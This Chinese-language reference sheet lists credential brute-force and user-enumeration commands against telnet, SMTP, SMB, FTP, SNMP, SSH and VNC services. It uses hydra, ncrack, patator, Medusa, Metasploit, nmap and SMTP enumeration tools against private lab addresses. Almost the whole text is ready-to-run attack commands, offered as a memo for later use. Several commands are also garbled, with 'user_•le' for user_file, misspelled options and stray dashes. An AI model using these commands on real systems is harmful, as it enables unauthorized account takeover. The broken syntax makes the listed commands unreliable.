hydra、ncrack、patator、Metasploit 和 Medusa，爆破：telnet、SMTP、SMB、FTP、

本文对常见的系统服务的认证系统进行攻击尝试的方式做了汇总，使用到的工具主要包括 hydra、ncrack、patator、Metasploit 和 Medusa，这些工具默认在 kali 上已经安装，可以直接使用，本文主要涉及的服务包括：telnet、SMTP、SMB、FTP、SNMP、SSH、VNC，关于工具的介绍和服务的介绍未进行讲解，需自行查阅资料进行了解。

telnet

hydra

hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 telnet

-L

 指定用户名列表

-P

 指定密码列表

Ncrack

ncrack –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23

-U

 指定用户名列表

-P

 指定密码列表

Patator

patator telnet_login host=192.168.1.106 inputs=‘FILE0\nFILE1’ 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re=‘Username: | Password:’

Metasploit

use auxiliary/scanner/telnet/telnet_login              msf exploit (telnet_login)>set rhosts 192.168.1.106 (IP of Remote Host)              msf exploit (telnet_login)>set user_•le /root/Desktop/user txt              msf exploit (telnet_login)>set pass_•le /root/Desktop/pass.txt              msf exploit (telnet_login)>set stop_on_success true              msf exploit (telnet_login)> exploit
           

SMTP 

telent

连接 25 端口：

telnet 192.168.1.107 25

枚举用户，结果返回 550 则表示用户不存在，结果返回 250，251，252 表示用户是有效的：

vrfy [email protected]

Metasploit

use auxiliary/scanner/smtp/smtp_enum              msf auxiliary(smtp_enum) > set rhosts 192.168.1.107              msf auxiliary(smtp_enum) > set rport 25              msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt              msf auxiliary(smtp_enum) > exploit
           

smtp-user-enum

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M

 指定使用哪种方式枚举，比如 EXPN, VRFY 或 RCPT

-U

 指定用户名列表

-t

 指定目标主机 IP

指定邮箱后缀，用户名列表只需要名字即可，使用参数 

-D

:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

iSMTP

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

SMB

Hydra

hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb

Ncrack

ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445

Medusa

medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt

Metasploit​​​​​​​

use auxiliary/scanner/smb/smb_login              msf exploit (smb_login)>set rhost 192.168.1.118              msf exploit (smb_login)>set user_•le /root/Desktop/user.txt              msf exploit (smb_login)>set pass_•le /root/Desktop/pass.txt              msf exploit (smb_login)>set stop_on_success true              msf exploit (smb_login)>exploit
           

FTP 

Hydra

hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

Ncrack

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Medusa

Medusa -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Patator

patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

Metasploit

use auxiliary/scanner/ftp/ftp_login
         msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)msf exploit (ftp_login)>set user_•le /root/Desktop/user.txt              msf exploit (ftp_login)>set userpass_•le /root/Desktop/pass.txt              msf exploit (ftp_login)>set stop_on_success true              msf exploit (ftp_login)> exploit
           

SNMP 

Hydra

hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

Medusa

medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt

Metasploit

use auxiliary/scanner/snmp/snmp_login              msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)              msf auxiliary(scanner/snmp/snmp_login)> set pass_•le /root/Desktop/pass.txt              msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true               msf auxiliary(scanner/snmp/snmp_login)> run
           

Nmap

nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp- brute.communitiesdb=/root/Desktop/pass.txt

Onesixtyone

onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt

SSH

Hydra

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ssh

Medusa

medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh

Ncrack

ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103:22

Patator

patator ssh_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

Metasploit

use auxiliary/scanner/ssh/ssh_login              msf exploit (ssh_login)>set rhosts 192.168.1.103 (IP of Remote Host)              msf exploit (ssh_login)>set user_•le /root/Desktop/user.txt              msf exploit (ssh_login)>set pass_•le /root/Desktop/pass.txt              msf exploit (ssh_login)>exploit
           

VNC

Hydra

Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

Metasploit

use auxiliary/scanner/vnc/vnc_login              msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6              msf auxiliary(scanner/vnc/vnc_login) > set pass_•le /root/Desktop/pass.txt              msf auxiliary(scanner/vnc/vnc_login) > run
           

Patator

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

Medusa

Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

Ncrack

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900

总结

整体来看，这些工具可以对除了以上几种服务攻击之外，还可以对其他更多的服务进行攻击尝试，比如数据库服务中的 mssql、mysql、oracle 等，差异仅仅在于参数不同，这里主要做个备忘，以备不时之需，没啥技术含量，仅供参考。